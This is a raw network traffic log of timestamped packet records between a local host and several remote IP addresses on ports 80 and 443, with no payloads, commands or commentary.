Nov 11, 2024 10:33:04.953576088 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.953576088 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953598976 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.953624010 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.953766108 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953777075 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953794003 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953804970 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953807116 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.953814030 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.953815937 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953826904 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953829050 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.953839064 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953845978 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.953872919 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.953918934 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953936100 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953948975 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953955889 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.953962088 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953974009 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953977108 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.953993082 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.954010963 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.954163074 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954195976 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.954225063 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954236031 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954247952 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954255104 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954257011 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.954278946 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954282999 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.954289913 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954301119 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954312086 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.954313993 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954335928 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.954344034 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954355001 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954360008 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.954365969 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954377890 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954386950 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.954390049 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954400063 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954411030 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.954422951 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.954447031 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.954613924 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954624891 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954636097 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954648018 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954662085 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.954664946 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954675913 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.954678059 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954689026 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954700947 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954701900 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.954713106 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954724073 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954727888 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.954755068 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.954787016 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954797983 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954808950 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954817057 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.954821110 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954833031 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954842091 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.954844952 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954862118 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954870939 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.954874992 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954881907 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.954904079 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.954943895 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954956055 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954966068 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954977989 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.954977989 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.954989910 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.955003023 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.955003977 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.955015898 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.955025911 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.955029011 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.955044031 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.955055952 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.955065012 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.955068111 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.955079079 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.955090046 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.955091953 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.955104113 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.955115080 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.955115080 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.955131054 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.955140114 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.955143929 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.955152988 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.955156088 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.955168009 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.955177069 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.955179930 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.955189943 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.955205917 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.955223083 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.955785036 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.955796957 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.955806971 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.955831051 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.955847979 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.955863953 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.955874920 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.955884933 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.955897093 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.955899000 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.955907106 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.955912113 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.955924988 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.955928087 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.955955029 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.955960989 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.955969095 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.955971956 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.955984116 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.955992937 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.955996990 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.956022024 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.990545034 CET	49675	443	192.168.2.5	23.1.237.91
Nov 11, 2024 10:33:04.990545034 CET	49673	443	192.168.2.5	23.1.237.91
Nov 11, 2024 10:33:06.606352091 CET	443	49703	23.1.237.91	192.168.2.5
Nov 11, 2024 10:33:06.606436014 CET	49703	443	192.168.2.5	23.1.237.91
Nov 11, 2024 10:33:06.819811106 CET	49708	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:06.819820881 CET	443	49708	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:06.819895983 CET	49708	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:06.820065975 CET	49708	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:06.820086002 CET	443	49708	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.029757977 CET	49709	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.029791117 CET	443	49709	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.029863119 CET	49709	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.030822039 CET	49709	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.030836105 CET	443	49709	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.035204887 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.035247087 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.035350084 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.035840034 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.035854101 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.036400080 CET	49711	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.036411047 CET	443	49711	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.036475897 CET	49711	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.036699057 CET	49711	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.036710978 CET	443	49711	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.412491083 CET	443	49708	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.412811995 CET	49708	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.412818909 CET	443	49708	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.413872004 CET	443	49708	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.413945913 CET	49708	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.415344000 CET	49708	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.415399075 CET	443	49708	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.415553093 CET	49708	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.415561914 CET	443	49708	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.468511105 CET	49708	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.610454082 CET	443	49708	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.610507011 CET	443	49708	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.610539913 CET	443	49708	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.610569954 CET	443	49708	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.610610008 CET	49708	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.610630989 CET	443	49708	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.610641956 CET	49708	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.619684935 CET	443	49709	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.620687962 CET	49709	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.620698929 CET	443	49709	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.621701002 CET	443	49709	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.621763945 CET	49709	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.622029066 CET	49709	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.622101068 CET	443	49709	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.622153997 CET	49709	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.622484922 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.624648094 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.624655962 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.625547886 CET	443	49711	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.625790119 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.625847101 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.626138926 CET	49711	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.626147032 CET	443	49711	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.626528978 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.626589060 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.626643896 CET	49709	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.626655102 CET	443	49709	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.626753092 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.626759052 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.626771927 CET	49709	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.626775026 CET	443	49709	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.626822948 CET	49709	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.627370119 CET	443	49711	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.627425909 CET	49711	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.627886057 CET	49711	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.627953053 CET	443	49711	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.628093004 CET	49711	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.628098965 CET	443	49711	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.658588886 CET	49708	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.658596039 CET	443	49708	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.658716917 CET	49708	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.658759117 CET	443	49708	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.658819914 CET	49708	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.687186956 CET	49711	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.687186956 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.822094917 CET	443	49711	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.836879969 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.836934090 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.836968899 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.836982012 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.836991072 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.837030888 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.837100983 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.837106943 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.837146044 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.837342978 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.842355013 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.844569921 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.844578981 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.874691010 CET	49711	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.874701023 CET	443	49711	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.890285969 CET	49711	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.890326023 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.890336990 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.890353918 CET	443	49711	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.890595913 CET	443	49711	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.890650988 CET	49711	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.917711020 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.917738914 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.917767048 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.917781115 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.917834044 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.917957067 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.919665098 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.919688940 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.919709921 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.919719934 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.920044899 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.925826073 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.931360960 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.931416988 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.931483984 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.931502104 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.931571960 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.937131882 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.943027973 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.943145037 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.943149090 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.943160057 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.943483114 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.948930025 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.954296112 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.954334974 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.954346895 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.969412088 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.969585896 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.969597101 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.998776913 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.998807907 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.998827934 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.998838902 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.998873949 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.998888016 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.999114037 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.999136925 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.999154091 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.999159098 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:07.999208927 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:07.999212980 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.000022888 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.000102997 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:08.000108957 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.000530005 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.000576973 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:08.000581980 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.003880024 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.003926992 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:08.003931999 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.007690907 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.007729053 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.007747889 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:08.007755041 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.007852077 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:08.011562109 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.015589952 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.015620947 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.015677929 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:08.015686989 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.015727043 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:08.019751072 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.023829937 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.023890018 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:08.023895025 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.023904085 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.023941994 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:08.027852058 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.031934977 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.031970024 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.031981945 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:08.031986952 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.032020092 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:08.035862923 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.040030003 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.040071011 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:08.040079117 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.043979883 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.044044018 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:08.044049025 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.048003912 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.048099995 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:08.048106909 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.052035093 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.052066088 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.052083969 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:08.052092075 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.052371025 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:08.056040049 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.079711914 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.079742908 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.079766035 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.079773903 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:08.079780102 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.079802990 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:08.079972982 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.080007076 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.080015898 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:08.080023050 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.080094099 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.080127954 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.080131054 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:08.080137014 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.080187082 CET	49710	443	192.168.2.5	142.250.185.100
Nov 11, 2024 10:33:08.080967903 CET	443	49710	142.250.185.100	192.168.2.5
Nov 11, 2024 10:33:08.081001997 CET	443	49710	142.250.185.100	192.168.2.5
